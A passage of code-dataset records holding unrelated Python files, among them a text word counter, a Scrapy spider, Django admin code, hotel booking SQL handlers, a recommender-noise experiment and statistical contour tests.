pd or pa:\n                    all_info.append(part_count(filedir, position, dic))\n                fileend = time.time()\n                print('{} took {}s'.format(filedir, fileend - filestart))\n\n        if g:\n            with io.open(outputname + '/count_res/{}_ALL_Frequency.txt'.format(dicname), 'w', encoding=ocoding) as fw:\n                fw.write(u'word,count\\n')\n                res = []\n                for key in allsave:\n                    res.append([key, allsave[key]])\n                res.sort(key=getkey, reverse=True)\n                for item in res:\n                    fw.write(item[0] + ',' + str(item[1]) + '\\n')\n    else:\n        filestart = time.time()\n        if a or d:\n            all_info.append(pure_count(dic, filename, position))\n        # segment only, no counting\n        if p:\n            pure_part(filename, position)\n        # segment + count\n        if pd or pa:\n            all_info.append(part_count(filename, position, dic))\n        fileend = time.time()\n        print('{} took {}s'.format(filename, round(fileend - filestart, 2)))\n\n    with open(outputname + '/all_info.txt', 'w', encoding=ocoding) as fw:\n        fw.write('dictionary: {}\\n'.format(dicname))\n        fw.write('filename,total dictionary word count,total text word count,record count\\n')\n        fw.writelines(all_info)\n\n    allend = time.time()\n\n    print('total time: {}s'.format(round(allend-all_start, 2)))","sub_path":"count_all_0605_re.py","file_name":"count_all_0605_re.py","file_ext":"py","file_size_in_byte":17528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"407573914","text":"import re\n\n# read the digits of pi; a context manager ensures the file is closed\nwith open('pi_million_digits.txt', 'r') as pi:\n    data = pi.read()\nlists = str(data).split('.')\n\n# remove all whitespace using a regex\ndigits = re.sub(r\"\\s+\", \"\", lists[1])\n\ntotal = 0\nfor digit in digits:\n    total += int(digit)\n\nprint(\"Sum of all the digits after decimal in Pi: \", total)\n\n","sub_path":"assignment/fileAndException_handling/sumOfPi.py","file_name":"sumOfPi.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"107264920","text":"\"\"\"\nFunctions handling output formats.\n\nThis module deserves a cleaner rewrite some day.\n\"\"\"\n\nimport logging\nimport os\nimport pkg_resources\nimport warnings\n\nfrom mapchete import errors\n\n\nlogger = logging.getLogger(__name__)\n_DRIVERS_ENTRY_POINT = \"mapchete.formats.drivers\"\n_FILE_EXT_TO_DRIVER = {}\n\n\ndef _file_ext_to_driver():\n    global _FILE_EXT_TO_DRIVER\n    if _FILE_EXT_TO_DRIVER:\n        return _FILE_EXT_TO_DRIVER\n    else:\n        _FILE_EXT_TO_DRIVER = {}\n        for v in pkg_resources.iter_entry_points(_DRIVERS_ENTRY_POINT):\n            _driver = v.load()\n            if not hasattr(_driver, \"METADATA\"):\n                warnings.warn(\n                    \"driver %s cannot be loaded, METADATA is missing\" % (\n                        str(v).split(\" \")[-1]\n                    )\n                )\n                continue\n            else:\n                metadata = v.load().METADATA\n                try:\n                    driver_name = metadata[\"driver_name\"]\n                    for ext in metadata[\"file_extensions\"]:\n                        if ext in _FILE_EXT_TO_DRIVER:\n                            _FILE_EXT_TO_DRIVER[ext].append(driver_name)\n                        else:\n                            _FILE_EXT_TO_DRIVER[ext] = [driver_name]\n                except Exception:\n                    pass\n        if not _FILE_EXT_TO_DRIVER:\n            raise errors.MapcheteDriverError(\"no drivers could be found\")\n        return _FILE_EXT_TO_DRIVER\n\n\ndef available_output_formats():\n    \"\"\"\n    Return all available output formats.\n\n    Returns\n    -------\n    formats : list\n        all available output formats\n    \"\"\"\n    output_formats = []\n    for v in pkg_resources.iter_entry_points(_DRIVERS_ENTRY_POINT):\n        driver_ = v.load()\n        if hasattr(driver_, \"METADATA\") and (\n            driver_.METADATA[\"mode\"] in [\"w\", \"rw\"]\n        ):\n            output_formats.append(driver_.METADATA[\"driver_name\"])\n    return output_formats\n\n\ndef available_input_formats():\n    \"\"\"\n    Return all available input formats.\n\n    Returns\n    -------\n    formats : list\n        all available input formats\n    \"\"\"\n    input_formats = []\n    for v in pkg_resources.iter_entry_points(_DRIVERS_ENTRY_POINT):\n        driver_ = v.load()\n        if 
hasattr(driver_, \"METADATA\") and (driver_.METADATA[\"mode\"] in [\"r\", \"rw\"]):\n input_formats.append(driver_.METADATA[\"driver_name\"])\n return input_formats\n\n\ndef load_output_writer(output_params, readonly=False):\n \"\"\"\n Return output class of driver.\n\n Returns\n -------\n output : ``OutputData``\n output writer object\n \"\"\"\n if not isinstance(output_params, dict):\n raise TypeError(\"output_params must be a dictionary\")\n driver_name = output_params[\"format\"]\n for v in pkg_resources.iter_entry_points(_DRIVERS_ENTRY_POINT):\n _driver = v.load()\n if all(\n [hasattr(_driver, attr) for attr in [\"OutputData\", \"METADATA\"]]\n ) and (\n _driver.METADATA[\"driver_name\"] == driver_name\n ):\n return _driver.OutputData(output_params, readonly=readonly)\n raise errors.MapcheteDriverError(\n \"no loader for driver '%s' could be found.\" % driver_name\n )\n\n\ndef load_input_reader(input_params, readonly=False):\n \"\"\"\n Return input class of driver.\n\n Returns\n -------\n input_params : ``InputData``\n input parameters\n \"\"\"\n logger.debug(\"find input reader with params %s\", input_params)\n if not isinstance(input_params, dict):\n raise TypeError(\"input_params must be a dictionary\")\n if \"abstract\" in input_params:\n driver_name = input_params[\"abstract\"][\"format\"]\n elif \"path\" in input_params:\n if os.path.splitext(input_params[\"path\"])[1]:\n input_file = input_params[\"path\"]\n driver_name = driver_from_file(input_file)\n else:\n logger.debug(\"%s is a directory\", input_params[\"path\"])\n driver_name = \"TileDirectory\"\n else:\n raise errors.MapcheteDriverError(\"invalid input parameters %s\" % input_params)\n for v in pkg_resources.iter_entry_points(_DRIVERS_ENTRY_POINT):\n driver_ = v.load()\n if hasattr(driver_, \"METADATA\") and (\n driver_.METADATA[\"driver_name\"] == driver_name\n ):\n return v.load().InputData(input_params, readonly=readonly)\n raise errors.MapcheteDriverError(\n \"no loader for driver '%s' could be found.\" % driver_name)\n\n\ndef driver_from_file(input_file):\n \"\"\"\n Guess driver from file extension.\n\n Returns\n -------\n driver : string\n driver name\n \"\"\"\n file_ext = os.path.splitext(input_file)[1].split(\".\")[1]\n if file_ext not in _file_ext_to_driver():\n raise errors.MapcheteDriverError(\n \"no driver could be found for file extension %s\" % file_ext\n )\n driver = _file_ext_to_driver()[file_ext]\n if len(driver) > 1:\n warnings.warn(\n \"more than one driver for file found, taking %s\" % driver[0]\n )\n return driver[0]\n","sub_path":"mapchete/formats/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"13917892","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\nfrom locations.items import GeojsonPointItem\n\n\nclass LjsilversSpider(scrapy.Spider):\n name = \"ljsilvers\"\n item_attributes = {\"brand\": \"Long John Silver's\", \"brand_wikidata\": \"Q1535221\"}\n allowed_domains = [\"ljsilvers.com\"]\n start_urls = (\n \"https://viewer.blipstar.com/searchdbnew?uid=2483677&lat=45&lng=-103&value=10000\",\n )\n\n def parse(self, response):\n for row in response.json():\n if row.keys() == {\"fulltotal\", \"total\", \"units\"}:\n continue\n addr = scrapy.Selector(text=row[\"a\"])\n properties = {\n \"name\": row[\"n\"],\n \"ref\": row[\"bpid\"],\n \"lat\": row[\"lat\"],\n \"lon\": row[\"lng\"],\n \"addr_full\": addr.xpath(\"//p/text()\").extract_first(),\n \"city\": 
addr.css(\".storecity ::text\").extract_first(),\n \"state\": addr.css(\".storestate ::text\").extract_first(),\n \"postcode\": addr.css(\".storepostalcode ::text\").extract_first(),\n \"country\": row[\"c\"],\n \"phone\": row.get(\"p\"),\n }\n yield GeojsonPointItem(**properties)\n","sub_path":"locations/spiders/ljsilvers.py","file_name":"ljsilvers.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"368194736","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\nGiven a string that consists of only uppercase English letters, you can replace any letter in the string with another letter at most k times. Find the length of a longest substring containing all repeating letters you can get after performing the above operations.\n\nNote:\nBoth the string's length and k will not exceed 104.\n\nExample 1:\n\nInput:\ns = \"ABAB\", k = 2\n\nOutput:\n4\n\nExplanation:\nReplace the two 'A's with two 'B's or vice versa.\nExample 2:\n\nInput:\ns = \"AABABBA\", k = 1\n\nOutput:\n4\n\nExplanation:\nReplace the one 'A' in the middle with 'B' and form \"AABBBBA\".\nThe substring \"BBBB\" has the longest repeating letters, which is 4.\n\"\"\"\n\nclass Solution(object):\n def characterReplacement(self, s, k):\n \"\"\"\n :type s: str\n :type k: int\n :rtype: int\n \"\"\"\n if not s:\n return 0\n counts = collections.Counter()\n start = 0\n for end in xrange(len(s)):\n counts[s[end]] += 1\n if end - start + 1 - counts.most_common(1)[0][1] > k:\n counts[s[start]] -= 1\n start += 1\n return end - start + 1\n","sub_path":"Python/424-LongestRepeatingCharacterReplacement/characterReplacement.py","file_name":"characterReplacement.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"590301032","text":"import cPickle\r\n\r\ndef unpickle(file):\r\n \"\"\"Loads and returns a pickled data structure in the given `file` name\r\n Example usage:\r\n data = unpickle('output/U_20_std')\r\n \"\"\"\r\n fo = open(file, 'rb')\r\n data = cPickle.load(fo)\r\n fo.close()\r\n return data\r\n\r\ndef pickle(data, file):\r\n \"\"\"Dumps data to a file\r\n Example usage:\r\n pickle(U, 'output/U_20_std')\r\n \"\"\"\r\n fo = open(file,'wb')\r\n cPickle.dump(data,fo)\r\n fo.close()","sub_path":"final_project_code_mac/SrcTeam/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"552586963","text":"import pygame\nimport sys\npygame.init()\n\nclass Tower(pygame.sprite.Sprite):\n\n def __init__(self, x, y):\n\n super().__init__()\n self.image = pygame.image.load('resources/tower.png')\n self.rect = pygame.Rect(x, y, 50, 100)\n","sub_path":"tower.py","file_name":"tower.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"82048081","text":"from django.contrib import admin\nfrom Evaluation.models import *\n\nclass EvaluationAdmin(admin.ModelAdmin):\n fieldsets = [\n (\n None, {\n 'fields': [\n 'submission',\n 'tutor',\n 'creation_date',\n 'evaluation_text',\n 'evaluation_points',\n 'submission_time',\n 'lock_time',\n ]\n }\n ),\n ]\n list_display = ('id', 'get_submission_author', 'get_submission', 'get_tutor', 'creation_date', 'evaluation_text', 'evaluation_points', 'submission_time', 'lock_time', )\n readonly_fields = 
(\"creation_date\",)\n\n def get_submission(self, evaluation):\n url = '{}'\n elaboration_id = evaluation.submission.id\n return url.format(elaboration_id, elaboration_id)\n get_submission.short_description = 'Submission'\n get_submission.allow_tags = True\n\n def get_submission_author(self, evaluation):\n url = '{}'\n user_id = evaluation.submission.user.id\n matriculation_number = evaluation.submission.user.matriculation_number\n return url.format(user_id, matriculation_number)\n get_submission_author.short_description = 'Submission author'\n get_submission_author.allow_tags = True\n\n def get_tutor(self, evaluation):\n url = '{}'\n user_id = evaluation.tutor.id\n nickname = evaluation.tutor.nickname\n return url.format(user_id, nickname)\n get_tutor.short_description = 'Tutor'\n get_tutor.allow_tags = True\n\n search_fields = ['tutor__nickname']\n\nadmin.site.register(Evaluation, EvaluationAdmin)","sub_path":"Evaluation/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"134084088","text":"from jsonbender import K, S\nfrom jsonbender.string_ops import Format, ProtectedFormat\n\n\nclass TestFormat:\n @staticmethod\n def test_format():\n bender = Format(\"{} {} {} {noun}.\", K(\"This\"), K(\"is\"), K(\"a\"), noun=K(\"test\"))\n assert bender.bend(None) == \"This is a test.\"\n\n\nclass TestProtectedFormat:\n @staticmethod\n def test_format():\n bender = ProtectedFormat(\n \"{} {} {} {noun}.\",\n K(\"This\"),\n K(\"is\"),\n K(\"a\"),\n noun=S(\"noun\").optional(),\n )\n assert bender.bend({}) is None\n assert bender.bend({\"noun\": \"test\"}) == \"This is a test.\"\n","sub_path":"tests/test_string_ops.py","file_name":"test_string_ops.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"3384672","text":"import json\r\nimport random\r\nfrom sqlwrapper import gensql,dbget,dbput\r\nimport datetime\r\nfrom ApplicationDate import application_date\r\ndef HOTEL_BBL_POST_INSERT_GroupCancel(request):\r\n\r\n sql_value = json.loads(dbget(\"select block_cancel_no from business_block.block_cancel\"))\r\n print(sql_value,type(sql_value))\r\n \r\n sql_value1 = sql_value[0]['block_cancel_no']\r\n print(sql_value1,type(sql_value1))\r\n count = sql_value1 + 1\r\n psql = dbput(\"update business_block.block_cancel set block_cancel_no = '\"+str(sql_value[0]['block_cancel_no']+1)+\"'\")\r\n d = request.json\r\n d['cancellation_number'] = count\r\n print(d) \r\n sql = gensql('insert','business_block.group_cancel',d)\r\n print(sql)\r\n block_id = d.get(\"block_id\")\r\n psql = dbput(\"update business_block.business_block_definite set block_status_id = '5' where block_id = '\"+block_id+\"'\")\r\n cancelgrid = json.loads(dbget(\"select count(*) from business_block.grid where block_id= '\"+block_id+\"' \\\r\n\t union \\\r\n\t select count(*) from business_block.current_grid where block_id= '\"+block_id+\"' \"))\r\n print(cancelgrid)\r\n\r\n if cancelgrid[0]['count'] > 0:\r\n deltequery = dbput(\"delete from business_block.grid where block_id = '\"+block_id+\"' ; \\\r\n delete from business_block.current_grid where block_id = '\"+block_id+\"'\")\r\n app_datetime = application_date()\r\n #RES_Log_Time = datetime.datetime.utcnow()+datetime.timedelta(hours=5, minutes=30)\r\n RES_Log_Time = app_datetime[0]\r\n RES_Log_Date = app_datetime[1]\r\n print(RES_Log_Date)\r\n s = {}\r\n s['user_role'] = 
\"Admin\"\r\n\r\n s['date'] = RES_Log_Date\r\n s['time'] = RES_Log_Time\r\n s['block_id'] = d.get(\"block_id\")\r\n s['action_type_id'] = \"Group Cancelled\"\r\n s['description'] = d.get(\"cancel_description\")\r\n gensql('insert','business_block.business_block_activity_log',s)\r\n return(json.dumps({\"Return\": \"Record Inserted Successfully\",\"ReturnCode\": \"RIS\",\"Status\": \"Success\",\"StatusCode\": \"200\",'CancellationNumber':count},indent=4))\r\n","sub_path":"HOTEL_BBL_POST_INSERT_GroupCancel.py","file_name":"HOTEL_BBL_POST_INSERT_GroupCancel.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"507066341","text":"import requests\nimport sys\nimport pandas as pd\nimport pprint\nimport json\nimport time\nimport copy\n\nimport PBB_Core\n\n\ndef get_entrez_qid_map(prop_nr):\n query = '''\n SELECT * WHERE {{\n ?qid wdt:{} ?id .\n ?qid wdt:P703 wd:Q5 .\n }}\n '''.format(prop_nr)\n\n results = PBB_Core.WDItemEngine.execute_sparql_query(query=query)['results']['bindings']\n\n id_wd_map = dict()\n for z in results:\n id_wd_map[z['id']['value']] = z['qid']['value'].split('/')[-1]\n\n return id_wd_map\n\n\ndef main():\n # mirtar_base = pd.read_excel('~/Downloads/hsa_MTI(2).xlsx')\n mirtar_base = pd.read_csv('~/Downloads/hsa_MTI.csv', header=0, sep=',')\n pprint.pprint(mirtar_base.head(2))\n\n pprint.pprint(mirtar_base.iloc[1, 0])\n # pprint.pprint(mirtar_base.index)\n\n entrez_qid_map = get_entrez_qid_map('P351')\n\n # create subclass of 'mature microRNA'\n # create encoded by (if this can be determined, would be important)\n # create 'encodes' property on the genes\n # create 'found in taxon' property\n\n unique_mirs = mirtar_base['molecule_chembl_id'].unique()\n\n for mir in unique_mirs:\n\n # references = generate_refs(chembl_id)\n\n curr_mir_df = unique_mirs[unique_mirs['miRNA'] == mir]\n\n statements = list()\n\n # mature miRNA Q23838648\n\n for x in curr_mir_df.index:\n curr_mesh = curr_mir_df.loc[x, 'mesh_id']\n if pd.notnull(curr_mesh) and curr_mesh in mesh_wd_map:\n print(chembl_id, curr_mesh, 'found')\n\n\n\nif __name__ == '__main__':\n sys.exit(main())","sub_path":"rna/miRNA_bot.py","file_name":"miRNA_bot.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"159236264","text":"import pandas as pd\nimport os\n\nclass MetadataList:\n\n def __init__(self):\n print(\"Metadata List Generation from CSV is getting started\" + '\\n')\n\n\n def fn_getPath(self, strParent, list):\n \n \"\"\" This routine is intended to determine the path object in run time.\n and use that path (\"|\" separated) to traverse the JSON object.\n :param:strParent: parent level tag / label to identify parent of the child\n :param:list:json metadata / schema / data dictionary\n :return:path label in string format\n \"\"\"\n try:\n strFinal = ''\n Parent_Nm = strParent.split(\"|\")[0]\n Parent_fld = strParent.split(\"|\")[1]\n\n for item in list:\n if item[1] == Parent_Nm and item[13] == Parent_fld:\n strFinal = item[8]\n return strFinal\n\n except Exception as e:\n print(e)\n #logging.error(traceback.format_exc())\n #return None\n\n def fn_createList(self, myList):\n \n \"\"\" This routine is intended to create a list object \n from the metadata / schema / data dictionary to traverse the JSON object accordingly.\n incorporate a runtime path in the metadata / schema per level in the given json\n :param:myList: list object 
representation of json metadata / schema / data dictionary\n \"\"\"\n try:\n \n strFinalList = []\n \n lineCount = 0\n for row in myList:\n my_list = []\n my_list = row\n strFinalList.append(my_list)\n lineCount += 1\n\n count = 0\n for row in strFinalList:\n if count > 0:\n if row[2] != \"1\" and row[2] != \"0\":\n strPath = self.fn_getPath(row[7], strFinalList)\n row[8] = strPath + \"|\" + row[1]\n count = count + 1\n return strFinalList\n \n except Exception as e:\n print(e)\n #logging.error(traceback.format_exc())\n #return None\n \n\n def fn_createMetadataList(self, file):\n\n \"\"\" This routine is intended to create a \n list object which represents metadata from the supplied CSV file.\n :param:CSV file\n :return: List object represents metadata / data dictionary / schema object\n \"\"\" \n try:\n\n if os.path.exists(file) and os.path.splitext(file)[1] == '.csv':\n df1 = pd.read_csv(file)\n df1['DOMAIN_NAME'] = 'None'\n df1['RI_NODE'] = 0\n df1['ATTRIBUTE_NAME_concat'] = df1['ATTRIBUTE_NAME'].str.strip().fillna('NO') + '~' + \\\n df1['LOGICAL_DATATYPE'].str.strip().fillna('NO') + '~' + \\\n df1['PARENT_COLUMN'].str.strip().fillna('NO')\n\n df2 = df1[['FIELD_ID', 'TABLE_NAME', 'COLUMN_NAME', 'ATTRIBUTE_NAME_concat']]\n df2 = df2.rename(columns={'FIELD_ID': 'RI_NODE',\n 'TABLE_NAME': 'RI_DBTABLE',\n 'COLUMN_NAME': 'RI_TABLEFIELDS',\n 'ATTRIBUTE_NAME_concat': 'RI_ATTRIBUTENAME'})\n\n df3 = df1.merge(df2, how='left', on='RI_NODE')\n df3 = df3.loc[df3['CURRENT_IND'] == 'Y']\n\n dframe = pd.DataFrame()\n dframe['ENTITY_NAME'] = df3['ENTITY_NAME'].str.strip()\n dframe['DOMAINTYPE'] = df3['DOMAIN_NAME'].str.strip().str.upper()\n dframe['JSON_LEVEL'] = df3['NODE_LEVEL']\n dframe['DBTABLE'] = df3['TABLE_NAME'].str.strip()\n dframe['ATTRIBUTE_NAME'] = df3['ATTRIBUTE_NAME_concat'].str.strip()\n dframe['TABLEFIELDS'] = df3['COLUMN_NAME'].str.strip()\n dframe['PARENT'] = df3['PARENT_NODE'].str.strip()\n dframe['JSON_PATH'] = df3['NODE_PATH'].str.strip().fillna('None')\n dframe['ROOTENTRY'] = df3['ROOT_FLAG']\n dframe['SRC_JSONTAG'] = df3['RI_ATTRIBUTENAME'].str.strip().fillna('None')\n dframe['IS_ACTIVE'] = df3['CURRENT_IND'].str.strip()\n dframe['RI_DBTABLE'] = df3['RI_DBTABLE'].str.strip().fillna('None')\n dframe['RI_TABLEFIELDS'] = df3['RI_TABLEFIELDS'].str.strip().fillna('None')\n dframe['ENTITY_ID'] = df3['FIELD_ID']\n dframe = dframe.reset_index(drop=True).sort_values('ENTITY_ID', ascending=True)\n #print(dframe.to_string())\n\n finalList = []\n for index, row in dframe.iterrows():\n\n if row[\"ROOTENTRY\"] == 1:\n myList = list()\n myList.append(str(row[\"DOMAINTYPE\"]))\n myList.append(str(row[\"ENTITY_NAME\"]))\n myList.append(str(row[\"JSON_LEVEL\"]))\n myList.append(str(row[\"DBTABLE\"]) + \"_array\")\n\n strFields = \"\"\n strTableFields = \"\"\n strRIJsonTAG = \"\"\n strRITable = \"\"\n strRIFieldName = \"\"\n strTableName = \"\"\n\n newFrame = dframe.loc[(dframe[\"ENTITY_NAME\"] == row[\"ENTITY_NAME\"]) & (dframe[\"PARENT\"] == row[\"PARENT\"]) & (dframe[\"DOMAINTYPE\"] == row[\"DOMAINTYPE\"]) & (dframe[\"DBTABLE\"] == row[\"DBTABLE\"])] ## newFrame is required to get all the attributes detail of the the same entity_name under root_flag = 1\n\n for index1, row1 in newFrame.iterrows():\n strTableName = str(row1[\"DBTABLE\"])\n strFields = strFields + str(row1[\"ATTRIBUTE_NAME\"]) + \",\"\n strTableFields = strTableFields + str(row1[\"TABLEFIELDS\"]) + \",\"\n if row1[\"SRC_JSONTAG\"] != None :\n strRIJsonTAG = str(row1[\"SRC_JSONTAG\"])\n strRITable = str(row1[\"RI_DBTABLE\"])\n 
strRIFieldName = str(row1[\"RI_TABLEFIELDS\"])\n\n myList.append(strTableName)\n myList.append(strFields[:-1])\n myList.append(strTableFields[:-1])\n myList.append(str(row[\"PARENT\"]))\n myList.append(str(row[\"JSON_PATH\"]))\n myList.append(str(row[\"IS_ACTIVE\"]))\n myList.append(strRIJsonTAG)\n myList.append(strRITable)\n myList.append(strRIFieldName)\n myList.append(str(row[\"ENTITY_ID\"]))\n\n finalList.append(myList)\n\n finalMetadataList = self.fn_createList(finalList)\n #print('FINAL METADATA LIST:')\n #print(finalMetadataList)\n\n return finalMetadataList\n\n else:\n print(\"REQUIRED CSV INPUT FILE IS NOT AVAILABLE\")\n\n except Exception as e:\n print(e)\n #logging.error(traceback.format_exc())\n","sub_path":"json2oraparser/MetadataController/MetadataList.py","file_name":"MetadataList.py","file_ext":"py","file_size_in_byte":7253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"413524049","text":"# print('install splotlight if needed')\n#!pip install git+https://github.com/maciejkula/spotlight.git@master#egg=spotlight\n\n\n# # movielense data\n# - Download the 100k version from https://grouplens.org/datasets/movielens/\n# - extract to folder './ml-100k/'\n\nimport numpy as np\nfrom spotlight.interactions import Interactions\nfrom spotlight.cross_validation import random_train_test_split\nuser_ids, item_ids, ratings, timestamps = zip(*[i.strip().split('\\t') for i in open(\"./ml-100k/u.data\").readlines()])\nuser_ids = np.array([int(u) for u in list(user_ids)])\nitem_ids = np.array([int(i) for i in list(item_ids)])\ntimestamps = np.array([int(s) for s in list(timestamps)])\ninteractions = Interactions(user_ids=user_ids, item_ids=item_ids, timestamps=timestamps)\ntrain, test = random_train_test_split(interactions)\n\n\n# Create random noise\n\n\nimport random\npreserving_25_percent_items = []\npreserving_50_percent_items = []\npreserving_75_percent_items = []\nvmin = train.item_ids.min()\nvmax = train.item_ids.max()\nfor real_item_idx in train.item_ids:\n random_item_idx = random.randint(vmin, vmax)\n sampling_threshold = random.random()\n if sampling_threshold < .25:\n preserving_25_percent_items.append(real_item_idx)\n else:\n preserving_25_percent_items.append(random_item_idx)\n if sampling_threshold < .5:\n preserving_50_percent_items.append(real_item_idx)\n else:\n preserving_50_percent_items.append(random_item_idx)\n if sampling_threshold < .75:\n preserving_75_percent_items.append(real_item_idx)\n else:\n preserving_75_percent_items.append(random_item_idx)\n\n\n# Create train data\n\n\nuser_ids = train.user_ids\ntimestamps = train.timestamps\npreserving_25_percent_train = Interactions(user_ids=user_ids,\n item_ids=np.asarray(preserving_25_percent_items),\n timestamps=timestamps)\npreserving_50_percent_train = Interactions(user_ids=user_ids,\n item_ids=np.asarray(preserving_50_percent_items),\n timestamps=timestamps)\npreserving_75_percent_train = Interactions(user_ids=user_ids,\n item_ids=np.asarray(preserving_75_percent_items),\n timestamps=timestamps)\n\n\n# visulize train data\n\n\n# from matplotlib import pyplot\n# plt = pyplot.figure(figsize=(16,10))\n# pyplot.subplot(221)\n# pyplot.hist(item_ids, bins=50, alpha=0.7, label='100% item preserving', color='red')\n# pyplot.legend(loc='upper right')\n# pyplot.subplot(222)\n# pyplot.hist(preserving_25_percent_items, bins=50, alpha=0.7, color='green', \n# label='25% item preserving, 75% random noise' )\n# pyplot.legend(loc='upper right')\n# pyplot.subplot(223)\n# 
pyplot.hist(preserving_50_percent_items, bins=50, alpha=0.7, color='blue', \n# label= '50% item preserving, 50% random noise')\n# pyplot.legend(loc='upper right')\n# pyplot.subplot(224)\n# pyplot.hist(preserving_75_percent_items, bins=50, alpha=0.7, \n# label='75% item preserving, 25% random noise')\n# pyplot.legend(loc='upper right')\n# pyplot.show()\n\n\n# create train models\n\n\nfrom spotlight.sequence.implicit import ImplicitSequenceModel\nmodel = ImplicitSequenceModel(embedding_dim=128)\npreserving_25_percent_model = ImplicitSequenceModel(embedding_dim=128)\npreserving_50_percent_model = ImplicitSequenceModel(embedding_dim=128)\npreserving_75_percent_model = ImplicitSequenceModel(embedding_dim=128)\n\n\n# fit models\n\n\nmodel.fit(train.to_sequence(), verbose=True)\npreserving_25_percent_model.fit(preserving_25_percent_train.to_sequence(), verbose=True)\npreserving_50_percent_model.fit(preserving_50_percent_train.to_sequence(), verbose=True)\npreserving_75_percent_model.fit(preserving_75_percent_train.to_sequence(), verbose=True)\n\nimport torch\ntorch.save(preserving_25_percent_model, './preserving_25_percent_model.model')\ntorch.save(preserving_50_percent_model, './preserving_50_percent_model.model')\ntorch.save(preserving_75_percent_model, './preserving_75_percent_model.model')\n# result evaluation\n\nfrom spotlight.evaluation import mrr_score\ntrain_mrrs = mrr_score(model, train)\npreserving_25_train_mrrs = mrr_score(preserving_25_percent_model, preserving_25_percent_train)\npreserving_50_train_mrrs = mrr_score(preserving_50_percent_model, preserving_50_percent_train)\npreserving_75_train_mrrs = mrr_score(preserving_75_percent_model, preserving_75_percent_train)\n\ntest_mrrs = mrr_score(model, test)\npreserving_25_test_mrrs = mrr_score(preserving_25_percent_model, test)\npreserving_50_test_mrrs = mrr_score(preserving_50_percent_model, test)\npreserving_75_test_mrrs = mrr_score(preserving_75_percent_model, test)\n\nprint('For 100% preserving items')\nprint('Train MRRS {:.3f}, test MRRS {:.3f}'.format(train_mrrs.sum(), test_mrrs.sum()))\nprint('For 25% preserving items')\nprint('Train MRRS {:.3f}, test MRRS {:.3f}'.format(preserving_25_train_mrrs.sum(), preserving_25_test_mrrs.sum()))\nprint('For 50% preserving items')\nprint('Train MRRS {:.3f}, test MRRS {:.3f}'.format(preserving_50_train_mrrs.sum(), preserving_50_test_mrrs.sum()))\nprint('For 75% preserving items')\nprint('Train MRRS {:.3f}, test MRRS {:.3f}'.format(preserving_75_train_mrrs.sum(), preserving_75_test_mrrs.sum()))","sub_path":"experience.py","file_name":"experience.py","file_ext":"py","file_size_in_byte":5275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"142340529","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nTests the computation of contours.\n\"\"\"\n\nimport unittest\nimport os\n\nimport numpy as np\nimport pandas as pd\n\nfrom .context import viroconcom\n\nfrom viroconcom.params import ConstantParam, FunctionParam\n\nfrom viroconcom.distributions import (\n WeibullDistribution, ExponentiatedWeibullDistribution, LognormalDistribution,\n NormalDistribution, MultivariateDistribution)\nfrom viroconcom.contours import IFormContour, ISormContour, HighestDensityContour, DirectSamplingContour\n\n\n_here = os.path.dirname(__file__)\ntestfiles_path = os.path.abspath(os.path.join(_here, \"testfiles\"))\n\n\nclass ContourCreationTest(unittest.TestCase):\n\n def test_HDC2d_WL(self):\n \"\"\"\n 2-d HDC with Weibull and Lognormal distribution.\n\n 
The used probabilistic model is described in Vanem and Bitner-Gregersen\n (2012), DOI: 10.1016/j.apor.2012.05.006\n \"\"\"\n\n #define dependency tuple\n dep1 = (None, None, None)\n dep2 = (0, None, 0)\n\n #define parameters\n shape = ConstantParam(1.471)\n loc = ConstantParam(0.8888)\n scale = ConstantParam(2.776)\n par1 = (shape, loc, scale)\n\n mu = FunctionParam('power3', 0.1000, 1.489, 0.1901)\n sigma = FunctionParam('exp3', 0.0400, 0.1748, -0.2243)\n\n #del shape, loc, scale\n\n #create distributions\n dist1 = WeibullDistribution(*par1)\n dist2 = LognormalDistribution(mu=mu, sigma=sigma)\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n #del dist1, dist2, par1, par2, dep1, dep2, dependencies, distributions\n #calc contour\n n_years = 50\n limits = [(0, 20), (0, 18)]\n deltas = [0.1, 0.1]\n test_contour_HDC = HighestDensityContour(mul_dist, n_years, 3,\n limits, deltas)\n\n finaldt0 = pd.DataFrame({'x' : test_contour_HDC.coordinates[0][0],\n 'y' : test_contour_HDC.coordinates[0][1]})\n\n\n result0 = pd.read_csv(testfiles_path + \"/HDC2dWL_coordinates.csv\")\n\n for g,h in [(g, h) for g in result0.index for h in result0.columns]:\n self.assertAlmostEqual(result0.loc[g, h], finaldt0.loc[g, h], places=8)\n\n\n def test_HDC2d_ExponentiatedWbl(self):\n 